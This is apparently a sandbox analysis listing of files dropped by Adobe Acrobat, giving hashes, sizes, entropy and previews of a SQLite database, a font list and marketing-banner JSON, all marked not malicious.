                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):57344
                                                                                                                                      Entropy (8bit):3.291927920232006
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:vedRBvVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:veBci5H5FY+EUUUTTcHqFzqFP
                                                                                                                                      MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                                                                                                      SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                                                                                                      SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                                                                                                      SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:SQLite Rollback Journal
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16928
                                                                                                                                      Entropy (8bit):1.2157987320354986
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:7+tpuqLi+zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzm+Z1:7M0qLmFTIF3XmHjBoGGR+jMz+LhA
                                                                                                                                      MD5:F98FA6570124445E304117924399005B
                                                                                                                                      SHA1:F24BC0A19683DBD00DB6F6422631C1A10D2426E7
                                                                                                                                      SHA-256:E5FB58E3685EAFA9F134A965875148B35F6B43BEBC93904200FAC4F0243D3056
                                                                                                                                      SHA-512:A5E71B55122E983519D55B814F9D7C452D262FF49048C7683CAC9921095DBC8D8C1591F46CED25DFAD8DFE324285B3A548B20AA7ADCAE99C1B263E8187B66E80
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.... .c........|........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:PostScript document text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):185099
                                                                                                                                      Entropy (8bit):5.182478651346149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                                                                                      MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                                                                                      SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                                                                                      SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                                                                                      SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:PostScript document text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):185099
                                                                                                                                      Entropy (8bit):5.182478651346149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                                                                                      MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                                                                                      SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                                                                                      SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                                                                                      SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):295
                                                                                                                                      Entropy (8bit):5.3826235871140184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJM3g98kUwPeUkwRe9:YvXKXehXvWRuUhU3GMbLUkee9
                                                                                                                                      MD5:F5473BFD4D291446ECEA5BD18F5F000E
                                                                                                                                      SHA1:792D0B7F2CBD1761E07F92D00CB34F3D8394E76A
                                                                                                                                      SHA-256:8E4A0D2572E5344EE38EE07A3EE7A109185A0B93BEB4AE865F322D3C69C688ED
                                                                                                                                      SHA-512:987EDEA57A0A1815B4CDCEE0E2E1A6ADA7E094AEB0AAEF2A06AF3A345713026287CBEB244E9CC1D50271294FE2DEE0818D23FE94564ECD3C51442F71C8A9E49F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):294
                                                                                                                                      Entropy (8bit):5.332718633301196
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJfBoTfXpnrPeUkwRe9:YvXKXehXvWRuUhU3GWTfXcUkee9
                                                                                                                                      MD5:5BFD13EB04FE0D35A6002C301506A36F
                                                                                                                                      SHA1:4662F8EFBF9D1C11DE5B4C9D033C863781157F88
                                                                                                                                      SHA-256:ED1FBF8B6688A0DBA40C8F400DB8C2CDE5845F1CB92BEACAA9303C0D6EB98680
                                                                                                                                      SHA-512:D11B08EA0B3502774210AB0538F69079F11E64062AFC45C0A36777BFA625FFC6D19A894E8B147CE824D792B0FD4896C5291BE77034C8829FF27A669ABD6210F5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):294
                                                                                                                                      Entropy (8bit):5.310978128659003
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJfBD2G6UpnrPeUkwRe9:YvXKXehXvWRuUhU3GR22cUkee9
                                                                                                                                      MD5:7BA4DC25EAD76F056B2776A76F9E10F3
                                                                                                                                      SHA1:81049EF2E896A35D0B9BF4D64572A0AA29FEEC79
                                                                                                                                      SHA-256:55B55C30130B9A928A23D14E8755C4146F223A7ED955E7A6950659C5AE89A206
                                                                                                                                      SHA-512:DE6C1C90B76E932C46D177DD9065AFF5B8FE47D87B751503D5FF2590FEA78091C2EBFAE64306FF888C3BBFAEDBC448F4EB1C90B992314FDC6A5426DFCB17C150
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):285
                                                                                                                                      Entropy (8bit):5.371679572374201
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJfPmwrPeUkwRe9:YvXKXehXvWRuUhU3GH56Ukee9
                                                                                                                                      MD5:A09902AB42D0C33D416471D794EA8C77
                                                                                                                                      SHA1:1C5E0BCD2B163A76FAE42EC579DDF7DF80E1E1C5
                                                                                                                                      SHA-256:FD18007618391674DBD3F8BEB73F5B3A4C442E82314A40F1F66432882E746DDF
                                                                                                                                      SHA-512:08D0F5F3314A9F2CD36D482325E575EC2B6D4D474D8E1F15C34E3DECA06C0335374720E770B8ACF4A2072ED73BE6F2EE73502A11261121AEA2D61342DEE3E9C9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):292
                                                                                                                                      Entropy (8bit):5.336134508607545
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJfJWCtMdPeUkwRe9:YvXKXehXvWRuUhU3GBS8Ukee9
                                                                                                                                      MD5:62A157AF2D9B269E1A290485DF098ED5
                                                                                                                                      SHA1:8E3A2F38F2D2CDB69E92D9DD5EA92964BEB59423
                                                                                                                                      SHA-256:8A2C21BBF5513EB2D243CCF7A670BA1AC0958329CD60B09662421982BE733806
                                                                                                                                      SHA-512:43734A10F49E7F98164D54C286C12DAF2771DD2FD689C47186E78D88E118968784CA5BA1398BEEC3099E8A3D1226CEF89A23FC23CCDF35BB7EFEB813712E8C7F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):289
                                                                                                                                      Entropy (8bit):5.322998407303427
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJf8dPeUkwRe9:YvXKXehXvWRuUhU3GU8Ukee9
                                                                                                                                      MD5:C4CB42F10A366E4CCFE9224B276AFA5B
                                                                                                                                      SHA1:24C42B51506E0E100A0FA4E26DF9BDCED1CBB57E
                                                                                                                                      SHA-256:72999D9214EC03ECB5373C462053D04E6861E4DE7AD174D377D6040C23D28E90
                                                                                                                                      SHA-512:C407C9F29CA83BD2D8781EFF97313A9C517017846AB8C96F50F18ED6312B4FB51D03889141E05FCDE41EE8AE5971C3CB40D771DA6FCCC213F8D30B766EAE471B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):292
                                                                                                                                      Entropy (8bit):5.325396176453639
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJfQ1rPeUkwRe9:YvXKXehXvWRuUhU3GY16Ukee9
                                                                                                                                      MD5:C491B259E729CC8E8AB2D6FBF1B4F651
                                                                                                                                      SHA1:AE6C83E07E7B544C93C1A4AD5ECE757F3FC394EF
                                                                                                                                      SHA-256:8BBDC5773393AA914A81CB3F9375EA15FC30AFABC6144A6F5C649986C41F63AC
                                                                                                                                      SHA-512:69EDE93B0079976CC61F454AD492A4AB4ACC7B2077E34C620B96D1012055AE7356C371A79AB8043468DBB3CA9B409C9E1AE833CC5F00F14B893FDC9092EFE173
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):289
                                                                                                                                      Entropy (8bit):5.334568003582476
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJfFldPeUkwRe9:YvXKXehXvWRuUhU3Gz8Ukee9
                                                                                                                                      MD5:C89D7DDD87F4BAE0B3D719C7F60D7110
                                                                                                                                      SHA1:6C5C83C3EABC18B9436E2C353DCCE473B6664B94
                                                                                                                                      SHA-256:DF7DCDEA04F16F7614B96568C4EA55487928DE8CE5C66712B4E382AEA14BD465
                                                                                                                                      SHA-512:06971119107C2C8FEB99937EFDBC783496EB0CBC15E83CF96FBD955E9B2D5FE8F161E6631AC312088973570296A785804F01DCAEA0E5B54F9E6CD6FAA35F41A5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1372
                                                                                                                                      Entropy (8bit):5.742421935429681
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Yv6XWyUPKLgENRcbrZbq00iCCBrwJo++ns8ct4mFJN0:YvuUPEgigrNt0wSJn+ns8cvFJC
                                                                                                                                      MD5:2EACE871330B624C67A0BA45B71AC891
                                                                                                                                      SHA1:1E644C15A8487B6A8822FF871C55E44D60E837E1
                                                                                                                                      SHA-256:2E8464D5C1A06E8F3D38A42A8877096DEA70FC1FECEDF05EA52065AE0332D3EA
                                                                                                                                      SHA-512:D39CFCB19DC38FF6AFC34D6A4A02A89AE4F8D2FB8DBBD70D0596E7FED0302F34658F87AC5622F106874082EDB67219550844C5C1A1C3FF71223DD8941FAF47D1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"79887_247329ActionBlock_0","campaignId":79887,"containerId":"1","controlGroupId":"","treatmentId":"acc56846-d570-4500-a26e-7f8cf2b4acad","variationId":"247329"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNSIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTMiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBwcmVtaXVtIFBERiBhbmQgZS1zaWduaW5nIHRvb2xzLiIsImJ
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):289
                                                                                                                                      Entropy (8bit):5.329582906251518
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJfYdPeUkwRe9:YvXKXehXvWRuUhU3Gg8Ukee9
                                                                                                                                      MD5:9CBB7F709EE344C4379B9460FA39C74E
                                                                                                                                      SHA1:E8B47C7ADCC03EC1810F1C5082C93811AFD82D28
                                                                                                                                      SHA-256:2A707000FA09F610C79896292C8CEDBCBD661A468E71848198D95971642A9DDA
                                                                                                                                      SHA-512:15521CF7D58993F7347EF52BFFA6075AF4137F8942A1809734879EC01AB43374E9BFC0253922C0A7BA8E52FA3A2ACE9887B2F15EA73CAC1383EE775E86E5F2ED
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1395
                                                                                                                                      Entropy (8bit):5.777948967233225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Yv6XWyUSrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNc:YvuUSHgDv3W2aYQfgB5OUupHrQ9FJW
                                                                                                                                      MD5:F3611450DE75DB53F1C9A1D187229F88
                                                                                                                                      SHA1:CD669B1EB92D614394464932A800D6CFB4411E28
                                                                                                                                      SHA-256:B35BC8ACCB452E99DD8F43BA40B3DE8AA551F71DCE04D9AF4196FC061CB20864
                                                                                                                                      SHA-512:CA8B5399CB1747E2A78461333F968A6178B681B2244040C3DDED3E52D81191817B6EA883B31855932DAB17C07709A95774C49D1752ADC65C31FD0FD6E1B77338
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):291
                                                                                                                                      Entropy (8bit):5.312926684982072
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJfbPtdPeUkwRe9:YvXKXehXvWRuUhU3GDV8Ukee9
                                                                                                                                      MD5:E45942E2A1E6D43CA678EBB882ADFE56
                                                                                                                                      SHA1:8A1BA3307846DAE7032C088B64396928656E3595
                                                                                                                                      SHA-256:38D14ACB26EFF19949989FDC98BBC04070DD1B90464BA5454B7C680660728A2B
                                                                                                                                      SHA-512:11600E17D136619013FFC2D5421438D3B25BAEF4A58259E9E98C26A3C7354364EDD08BF97A670CB8E3575A6BBFC46E15908DB75C407712BB68CF3340155BA931
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):287
                                                                                                                                      Entropy (8bit):5.316403096284669
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJf21rPeUkwRe9:YvXKXehXvWRuUhU3G+16Ukee9
                                                                                                                                      MD5:2A958F01D210F2D73A01CFA1BE169384
                                                                                                                                      SHA1:D9A464BE0069E3D62BAE2CCC9B3DF4954526A8CD
                                                                                                                                      SHA-256:5E79E9B17750CFCAEEACF8C7BF620DE4A69B95FFAA24B25E418B1B0C1427F295
                                                                                                                                      SHA-512:AC77DD520BC0760B9D08FAC8095F9B0FED5ABE0339FF8674D6AA310705A77BA72A6C2EE4C65F12352598756EC5C30002CB48CB2018677431C4AC400881D6FCC2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):289
                                                                                                                                      Entropy (8bit):5.336124216935444
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJfbpatdPeUkwRe9:YvXKXehXvWRuUhU3GVat8Ukee9
                                                                                                                                      MD5:8AD18C9D797E8DE69CCE64B5CB3F87A9
                                                                                                                                      SHA1:3771D3B45C0DA94441C895C605635C93F21DF6AE
                                                                                                                                      SHA-256:357E04EDD18CB9A67981611B7A51E30DEA396D4B335A1ED7FFE42377E589BB43
                                                                                                                                      SHA-512:BCA1FACB27D08D161F17B8155BDF5499F10E6B419302F932E93B024635B70F5E54F870F3B65D13B9E009C676CE666A43986C182FA2EC2B10F19926CC9484D896
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):286
                                                                                                                                      Entropy (8bit):5.29445192614618
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YEQXJ2HXeQisCv5IRR4UhUR0YYoAvJfshHHrPeUkwRe9:YvXKXehXvWRuUhU3GUUUkee9
                                                                                                                                      MD5:C0B8031A70813C67DA6959F69F0A739A
                                                                                                                                      SHA1:CF4CC56921B21A6A572DC51FAF44B0C10A23B3A1
                                                                                                                                      SHA-256:EE4CFFFDB9E09898ED7451535DFAC946C7A91C2C6A0D34693C1B5435C811F346
                                                                                                                                      SHA-512:DCF3677EEAB2E6B7B3C7380E7033F569B0C1B343E00E72D516A07C30F9104852A8DE6D35D6C6B780FDAD857E6DFEB10A4364C4B6423738385BCFEBC101275B0E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):782
                                                                                                                                      Entropy (8bit):5.375075036578325
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YvXKXehXvWRuUhU3GTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWY:Yv6XWyU3168CgEXX5kcIfANhV
                                                                                                                                      MD5:87B942AE3CB3ECB070A31653AE9613CD
                                                                                                                                      SHA1:C0FAD7703EB964F3009F9631966C954CB0B3348B
                                                                                                                                      SHA-256:18C5FD00A208BE1D894773AD03CC1B6785D9FB2C7A03E44349EC7C4392BB5439
